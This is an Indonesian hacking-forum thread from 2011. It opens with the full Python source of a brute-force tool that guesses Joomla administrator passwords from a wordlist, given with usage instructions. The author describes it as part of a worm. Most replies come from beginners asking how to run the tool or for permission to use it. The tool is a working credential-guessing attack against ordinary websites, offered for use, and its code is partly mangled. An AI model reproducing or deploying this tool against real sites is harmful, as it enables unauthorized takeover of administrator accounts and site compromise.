Threaded Mode | Linear Mode

***mywisdom*** · (This post was last modified: 02-14-2011 03:48 AM by mywisdom.)

source code dengan indent asli
http://sowiesoft.com/.../joomlabrute.py

cara pake: ./joomlabrute.py username_admin password_list mywisdom_ganteng

Code:

#!/usr/bin/python

# Joomla bruteforcer tools

# This was written for educational purpose and pentest only. Use it at your own risk.

# Author will not be responsible for any damage !!

# Toolname     : joomlabruteforce.py inspired by wordpress brute force by gunslinger

# Pretty much one of my worm module

# Programmer     : mywisdom (http://myw1sd0m.blogspot.com)

# Version    : 1.0

#tis is one of my linux w0rm module for user enumerations, i've dual os worm

#thanks to: gunslinger,flyf666,petimati,kiddies,xtr0nic,c0mrade,n0te,v3n0m,iblis muda,cr4wl3r

#thanks to: isa m said, whitecyber

#thanks to all devilzc0de crews and members, all jasakom,jatimcrew crews and members

# Date        : Feb 14 th  2011

import re

import os

import sys

import random

import warnings

import time

global target,url_worm,words

try:

    import mechanize

except ImportError:

    print "[*] Please install mechanize python module first"

    sys.exit(1)

except KeyboardInterrupt:

    print "\n[*] Exiting program...\n"

    sys.exit(1)

try:

    import cookielib

except ImportError:

    print "[*] Please install cookielib python module first"

    sys.exit(1)

except KeyboardInterrupt:

    print "\n[*] Exiting program...\n"

    sys.exit(1)

warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

for arg in sys.argv:

   try:    

      target=sys.argv[1]

      username=sys.argv[2]

      wordlist=sys.argv[3]

      url_worm=sys.argv[4]

      targetsite="http://"+target+"/administrator"      

   except Exception, err:

      print "ada error nih tar lo ada kesalahan"    

def bruteforce(word):

             global url_worm

        success='Logout'

        br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

        opensite = br.open(targetsite)

        br.select_form(nr=0)

        br.form['username'] = username

        br.form['passwd'] = word

        br.submit()

        response = br.response().read()

        if success in response:

            print "\n\n[*] Logging in success..."

            print "[*] Username : %s" % (username)

            print "[*] Password : %s\n" % (word)

            sys.exit(1)

            print "w00t"

        else:

                    print "failed login using"+username+ " and password:"+word

def main():

    global br

    global words

    try:

        br = mechanize.Browser()

        cj = cookielib.LWPCookieJar()

        br.set_cookiejar(cj)

        br.set_handle_equiv(True)

        br.set_handle_gzip(True)

        br.set_handle_redirect(True)

        br.set_handle_referer(True)

        br.set_handle_robots(False)

        br.set_debug_http(False)

        br.set_debug_redirects(False)

        br.set_debug_redirects(False)

        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

    except KeyboardInterrupt:

        print "\n[*] Exiting program...\n"

        sys.exit(1)

main()

global word

try:

        file = open(wordlist, "r")

        words            = file.readlines()

except KeyboardInterrupt:

        print "\n[*] Exiting program...\n"

        sys.exit(1)

for word in words:

        bruteforce(word.replace("\n",""))

**anbu** · 02-14-2011, 04:38 AM

pertamax

seberapa lama ne om ketawa

biasa teknik brute kan lama banget mewek

helsinki · 02-14-2011, 05:03 AM

om wisdom,, cara pakainya gimana yak?
$python joomlabrute.py ?
kok ga ada helpnya :) maklum om nubi

**anbu** · 02-14-2011, 05:11 AM

(02-14-2011 05:03 AM)helsinki Wrote: om wisdom,, cara pakainya gimana yak?
$python joomlabrute.py ?
kok ga ada helpnya :) maklum om nubi

instal python dulu kak smangat

n0wn · 02-14-2011, 06:49 AM

(02-14-2011 03:43 AM)mywisdom Wrote: cara pake: ./joomlabrute.py username_admin password_list mywisdom_ganteng

waw...

izin pakai om

hmm

helsinki · 02-15-2011, 08:12 AM

(02-14-2011 05:11 AM)ade yonatan Wrote:
(02-14-2011 05:03 AM)helsinki Wrote: om wisdom,, cara pakainya gimana yak?
$python joomlabrute.py ?
kok ga ada helpnya :) maklum om nubi

instal python dulu kak

udah kak... bawaan dari ubuntu :)

(02-14-2011 06:49 AM)n0wn Wrote:
(02-14-2011 03:43 AM)mywisdom Wrote: cara pake: ./joomlabrute.py username_admin password_list mywisdom_ganteng

gak teliti baca tritnya tadi om,, maaff.....

waw...

izin pakai om

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	Belajaran python (brute hash)	xc0debatch	9	556	12-11-2012 09:30 AM Last Post: coolkuya